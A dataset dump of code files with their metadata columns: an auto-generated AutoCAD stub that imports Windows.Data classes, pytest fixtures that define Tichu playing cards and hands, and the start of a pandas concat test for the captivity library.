hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b48b9a465a40ad938627cb3aff48b3fbd10b5d75
| 9,386
|
py
|
Python
|
extensions/.stubs/clrclasses/Autodesk/AutoCAD/Windows/Data/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | 1
|
2020-03-25T03:27:24.000Z
|
2020-03-25T03:27:24.000Z
|
extensions/.stubs/clrclasses/Autodesk/AutoCAD/Windows/Data/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | null | null | null |
extensions/.stubs/clrclasses/Autodesk/AutoCAD/Windows/Data/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | null | null | null |
import __clrclasses__.Autodesk.AutoCAD.Windows.Data.Render as Render
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AnimationEditor
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AttachmentPointCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AutoCompleteList
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AutoCompleteToolTipService
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AutoCorrectList
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AutoCorrectorService
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import AutoCorrectType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import BackgroundMaskCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import BlockEditor
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CellStyleConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CharacterSetCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ClearLineSpaceCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CloseCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CMLContentSearchPreviews
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ColorCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ColorCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ColorSetting
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ColorToNamedValueConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ColumnsSettingsDialogCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import Command
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandCompletionType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandEditor
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandEditorManager
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandHistory
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandLineItem
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommandStack
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommonProperties
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CommonProperty
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import CompositeConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ContentSearchCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DataBindings
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DataItemCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DataItemCollections
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DataItemFactoryMethod
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DbObjectCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DefinedSymbolsCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DisposingEventHandler
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import DoubleToStringConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EffectiveProperties
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EffectiveProperty
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EffectivePropertySource
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EnumItemCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EnumSubsetConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import EplotExport
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import Expression
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ExtendedPropertyEventArgs
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ExtendedPropertyEventHandler
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ExtendedPropertyManager
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import FieldDialogCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import FindReplaceCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import FindTextCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import GeoData
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import HatchCommands
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import HatchPatterns
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IDataItem
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IDataItemTransaction
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IInvalidateProperty
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ILookup
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ImportCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import INamedImageProvider
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import INamedValue
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import INotifyCollectionItemsChanged
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import InplaceTextEditor
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import InputBuffer
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import InputSearchOptions
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import Int32ToImageConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEAttachmentPoint
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEColumnType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPECommandBase
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEDynamicColumnType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEEditorSettings
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPENumberingType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPENumberingTypeEnumConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEParagraphAlignmentType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IPEStaticColumnType
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import IsoDraft
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LayerFilterCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LayerRecordCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LightEngine
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LineSpacingMultiplesCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LineSpacingTypes
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LineSpacingTypesEnumConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LineWeightCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import LowercaseCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import MoreLineSpaceCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import MultiReplaceConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NamedImageProvider
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NamedObjectCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NativeFunction
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NavStatus
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NotifyCollectionItemsChangedEventArgs
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NotifyCollectionItemsChangedEventHandler
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NullToVariesConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import NumberingCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import OptionsCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ParagraphAlignmentOpionsCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ParagraphDialogCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import PatPatternCategory
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import PlotStyleCollection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import PlotStyleNameToDataItemConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import PromptAndInput
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import RedoCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import RenderPresetConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ReplaceConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import Selection
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import SourceToTypeConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import StandardConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import StandardUcsPlane
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import StaticColumnsCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import SubEntity
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import SystemVariable
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import SysvarMonitorState
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import TextSize
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ThemeEngine
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import TransparencyItem
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import TrueValues
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import UIFontInfo
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import UndoCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import UppercaseCommand
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import ValueToNamedValueConverter
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import View2DRibbonItemData
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import Views2DCommands
from __clrclasses__.Autodesk.AutoCAD.Windows.Data import WorkspaceCollection
| 75.088
| 97
| 0.894204
| 993
| 9,386
| 7.952669
| 0.132931
| 0.282639
| 0.392554
| 0.502469
| 0.721033
| 0.716475
| 0.716475
| 0
| 0
| 0
| 0
| 0.00045
| 0.052845
| 9,386
| 124
| 98
| 75.693548
| 0.887852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
c30c0c1445e9826855b84d6f759a165da02d08a0
| 11,545
|
py
|
Python
|
tests/conftest.py
|
alxwdm/TichuAgent
|
d498d1050264d13c920018006e3dcc2a04bc61df
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
alxwdm/TichuAgent
|
d498d1050264d13c920018006e3dcc2a04bc61df
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
alxwdm/TichuAgent
|
d498d1050264d13c920018006e3dcc2a04bc61df
|
[
"MIT"
] | null | null | null |
# pytest test cases configuration file
import pytest
from env.card import Card
from env.cards import Cards
from env.player import Player
# define pytest fixtures
# class Card test fixtures
# 2
@pytest.fixture(scope='session', autouse='True')
def Spd_2():
return Card(name='2', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_2():
return Card(name='2', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_2():
return Card(name='2', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_2():
return Card(name='2', suit='Club')
#3
@pytest.fixture(scope='session', autouse='True')
def Spd_3():
return Card(name='3', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_3():
return Card(name='3', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_3():
return Card(name='3', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_3():
return Card(name='3', suit='Club')
# 4
@pytest.fixture(scope='session', autouse='True')
def Spd_4():
return Card(name='4', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_4():
return Card(name='4', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_4():
return Card(name='4', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_4():
return Card(name='4', suit='Club')
# 5
@pytest.fixture(scope='session', autouse='True')
def Spd_5():
return Card(name='5', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_5():
return Card(name='5', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_5():
return Card(name='5', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_5():
return Card(name='5', suit='Club')
# 6
@pytest.fixture(scope='session', autouse='True')
def Spd_6():
return Card(name='6', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_6():
return Card(name='6', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_6():
return Card(name='6', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_6():
return Card(name='6', suit='Club')
# 7
@pytest.fixture(scope='session', autouse='True')
def Spd_7():
return Card(name='7', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_7():
return Card(name='7', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_7():
return Card(name='7', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_7():
return Card(name='7', suit='Club')
# 8
@pytest.fixture(scope='session', autouse='True')
def Spd_8():
return Card(name='8', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_8():
return Card(name='8', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_8():
return Card(name='8', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_8():
return Card(name='8', suit='Club')
# 9
@pytest.fixture(scope='session', autouse='True')
def Spd_9():
return Card(name='9', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_9():
return Card(name='9', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_9():
return Card(name='9', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_9():
return Card(name='9', suit='Club')
# 10
@pytest.fixture(scope='session', autouse='True')
def Spd_10():
return Card(name='10', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_10():
return Card(name='10', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_10():
return Card(name='10', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_10():
return Card(name='10', suit='Club')
# J
@pytest.fixture(scope='session', autouse='True')
def Spd_J():
return Card(name='J', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_J():
return Card(name='J', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_J():
return Card(name='J', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_J():
return Card(name='J', suit='Club')
# Q
@pytest.fixture(scope='session', autouse='True')
def Spd_Q():
return Card(name='Q', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_Q():
return Card(name='Q', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_Q():
return Card(name='Q', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_Q():
return Card(name='Q', suit='Club')
# K
@pytest.fixture(scope='session', autouse='True')
def Spd_K():
return Card(name='K', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_K():
return Card(name='K', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_K():
return Card(name='K', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_K():
return Card(name='K', suit='Club')
# A
@pytest.fixture(scope='session', autouse='True')
def Spd_A():
return Card(name='A', suit='Spade')
@pytest.fixture(scope='session', autouse='True')
def Hrt_A():
return Card(name='A', suit='Heart')
@pytest.fixture(scope='session', autouse='True')
def Dia_A():
return Card(name='A', suit='Dia')
@pytest.fixture(scope='session', autouse='True')
def Clb_A():
return Card(name='A', suit='Club')
# Special
@pytest.fixture(scope='session', autouse='True')
def Majong():
return Card(name='Majong', suit='Special')
@pytest.fixture(scope='session', autouse='True')
def Dog():
return Card(name='Dog', suit='Special')
@pytest.fixture(scope='session', autouse='True')
def Phoenix():
return Card(name='Phoenix', suit='Special')
@pytest.fixture(scope='session', autouse='True')
def Dragon():
return Card(name='Dragon', suit='Special')
# class Cards test fixtures
@pytest.fixture(scope='session', autouse='True')
def hand_0(Spd_10, Hrt_10, Dia_2, Phoenix, Dragon, Clb_K, Dia_J, Clb_J):
return Cards([Spd_10, Hrt_10, Dia_2, Phoenix, Dragon, Clb_K, Dia_J, Clb_J])
@pytest.fixture(scope='session', autouse='True')
def hand_1(Clb_J, Dia_J, Phoenix, Dog):
return Cards([Clb_J, Dia_J, Phoenix, Dog])
@pytest.fixture(scope='session', autouse='True')
def hand_2(Clb_J, Dia_J, Phoenix, Dragon):
return Cards([Clb_J, Dia_J, Phoenix, Dragon])
@pytest.fixture(scope='session', autouse='True')
def hand_3(Clb_J, Clb_10, Spd_K, Hrt_K, Clb_Q, Dia_Q):
return Cards([Clb_J, Clb_10, Spd_K, Hrt_K, Clb_Q, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def hand_4(Clb_2, Hrt_2, Spd_3, Phoenix, Clb_5, Dia_5, Clb_6, Dia_6):
return Cards([Clb_2, Hrt_2, Spd_3, Phoenix, Clb_5, Dia_5, Clb_6, Dia_6])
@pytest.fixture(scope='session', autouse='True')
def hand_5(Clb_2, Phoenix, Spd_4, Clb_4):
return Cards([Clb_2, Phoenix, Spd_4, Clb_4])
@pytest.fixture(scope='session', autouse='True')
def hand_6(Majong, Dog, Clb_2, Clb_3, Hrt_4, Phoenix, Dragon, Spd_K, Dia_K, Hrt_K, Clb_A, Hrt_A):
return Cards([Majong, Dog, Clb_2, Clb_3, Hrt_4, Phoenix, Dragon, Spd_K, Dia_K, Hrt_K, Clb_A, Hrt_A])
@pytest.fixture(scope='session', autouse='True')
def pass_0():
return Cards([])
@pytest.fixture(scope='session', autouse='True')
def solo_0(Spd_A):
return Cards([Spd_A])
@pytest.fixture(scope='session', autouse='True')
def solo_1(Hrt_5):
return Cards([Hrt_5])
@pytest.fixture(scope='session', autouse='True')
def solo_2(Dragon):
return Cards([Dragon])
@pytest.fixture(scope='session', autouse='True')
def solo_3(Phoenix):
return Cards([Phoenix])
@pytest.fixture(scope='session', autouse='True')
def pair_0(Spd_J, Dia_J):
return Cards([Spd_J, Dia_J])
@pytest.fixture(scope='session', autouse='True')
def pair_1(Spd_7, Phoenix):
return Cards([Spd_7, Phoenix])
@pytest.fixture(scope='session', autouse='True')
def pair_2(Dragon, Phoenix):
return Cards([Dragon, Phoenix]) # no pair
@pytest.fixture(scope='session', autouse='True')
def triple_0(Spd_K, Hrt_K, Dia_K):
return Cards([Spd_K, Hrt_K, Dia_K])
@pytest.fixture(scope='session', autouse='True')
def triple_1(Spd_3, Hrt_3, Phoenix):
return Cards([Spd_3, Hrt_3, Phoenix])
@pytest.fixture(scope='session', autouse='True')
def four_0(Spd_10, Hrt_10, Dia_10, Clb_10):
return Cards([Spd_10, Hrt_10, Dia_10, Clb_10]) # bomb
@pytest.fixture(scope='session', autouse='True')
def four_1(Spd_10, Hrt_10, Dia_10, Phoenix):
return Cards([Spd_10, Hrt_10, Dia_10, Phoenix]) # no bomb
@pytest.fixture(scope='session', autouse='True')
def full_0(Spd_3, Hrt_3, Clb_3, Spd_K, Hrt_K):
return Cards([Spd_3, Hrt_3, Clb_3, Spd_K, Hrt_K])
@pytest.fixture(scope='session', autouse='True')
def full_1(Spd_K, Hrt_K, Phoenix, Spd_3, Hrt_3):
return Cards([Spd_K, Hrt_K, Phoenix, Spd_3, Hrt_3])
@pytest.fixture(scope='session', autouse='True')
def full_2(Spd_4, Hrt_4, Clb_4, Phoenix, Hrt_K):
return Cards([Spd_4, Hrt_4, Clb_4, Phoenix, Hrt_K])
@pytest.fixture(scope='session', autouse='True')
def strt_0(Spd_3, Hrt_4, Clb_5, Spd_6, Hrt_7, Clb_8):
return Cards([Spd_3, Hrt_4, Clb_5, Spd_6, Hrt_7, Clb_8])
@pytest.fixture(scope='session', autouse='True')
def strt_1(Spd_3, Hrt_4, Clb_5, Phoenix, Hrt_7):
return Cards([Spd_3, Hrt_4, Clb_5, Phoenix, Hrt_7])
@pytest.fixture(scope='session', autouse='True')
def strt_2(Majong, Hrt_2, Clb_3, Phoenix, Hrt_4):
return Cards([Majong, Hrt_2, Clb_3, Phoenix, Hrt_4])
@pytest.fixture(scope='session', autouse='True')
def strt_3(Spd_5, Hrt_2, Clb_3, Phoenix, Hrt_4):
return Cards([Spd_5, Hrt_2, Clb_3, Phoenix, Hrt_4])
@pytest.fixture(scope='session', autouse='True')
def strt_4(Spd_5, Spd_6, Spd_7, Spd_8, Spd_9):
return Cards([Spd_5, Spd_6, Spd_7, Spd_8, Spd_9]) # straight bomb
@pytest.fixture(scope='session', autouse='True')
def strt_5(Spd_5, Hrt_2, Clb_6, Phoenix, Hrt_7):
return Cards([Spd_5, Hrt_2, Clb_6, Phoenix, Hrt_7]) # hand (no straight)
@pytest.fixture(scope='session', autouse='True')
def strt_6(Spd_A, Clb_K, Dia_J, Clb_Q, Dragon):
return Cards([Spd_A, Clb_K, Dia_J, Clb_Q, Dragon]) # hand (no straight)
@pytest.fixture(scope='session', autouse='True')
def strt_7(Majong, Hrt_2, Clb_3, Clb_5, Hrt_4):
return Cards([Majong, Hrt_2, Clb_3, Clb_5, Hrt_4])
@pytest.fixture(scope='session', autouse='True')
def ps_0(Spd_J, Dia_J, Clb_Q, Dia_Q):
return Cards([Spd_J, Dia_J, Clb_Q, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def ps_1(Spd_K, Phoenix, Clb_Q, Dia_Q):
return Cards([Spd_K, Phoenix, Clb_Q, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def ps_2(Clb_J, Dia_J, Spd_K, Phoenix, Clb_K, Dia_Q):
return Cards([Clb_J, Dia_J, Spd_K, Phoenix, Clb_K, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def ps_3(Clb_J, Dia_J, Spd_K, Phoenix, Clb_Q, Dia_Q):
return Cards([Clb_J, Dia_J, Spd_K, Phoenix, Clb_Q, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def ps_4(Clb_J, Phoenix, Spd_K, Hrt_K, Clb_Q, Dia_Q):
return Cards([Clb_J, Phoenix, Spd_K, Hrt_K, Clb_Q, Dia_Q])
@pytest.fixture(scope='session', autouse='True')
def ps_5(Clb_2, Phoenix, Spd_2, Hrt_4):
return Cards([Clb_2, Phoenix, Spd_2, Hrt_4])
# class Player fixtures
@pytest.fixture(scope='session', autouse='True')
def player_0():
return Player()
@pytest.fixture(scope='session', autouse='True')
def player_1():
return Player()
| 28.435961
| 104
| 0.682633
| 1,875
| 11,545
| 4.024
| 0.033067
| 0.161962
| 0.224254
| 0.311465
| 0.919284
| 0.913983
| 0.777601
| 0.749636
| 0.512392
| 0.412459
| 0
| 0.028252
| 0.12317
| 11,545
| 405
| 105
| 28.506173
| 0.71708
| 0.020702
| 0
| 0.335664
| 0
| 0
| 0.120656
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.328671
| false
| 0.003497
| 0.013986
| 0.328671
| 0.671329
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
c32ae4306fe6b2c78e7137055dc202966cb92401
| 571
|
py
|
Python
|
captivity/tests/test_concat.py
|
maxsnijders/captivity
|
c3c2bde554f83e567c8e078db4e6bccda57eff8b
|
[
"MIT"
] | null | null | null |
captivity/tests/test_concat.py
|
maxsnijders/captivity
|
c3c2bde554f83e567c8e078db4e6bccda57eff8b
|
[
"MIT"
] | null | null | null |
captivity/tests/test_concat.py
|
maxsnijders/captivity
|
c3c2bde554f83e567c8e078db4e6bccda57eff8b
|
[
"MIT"
] | null | null | null |
import pytest
def test_concat_with_duplicate_columns():
import captivity
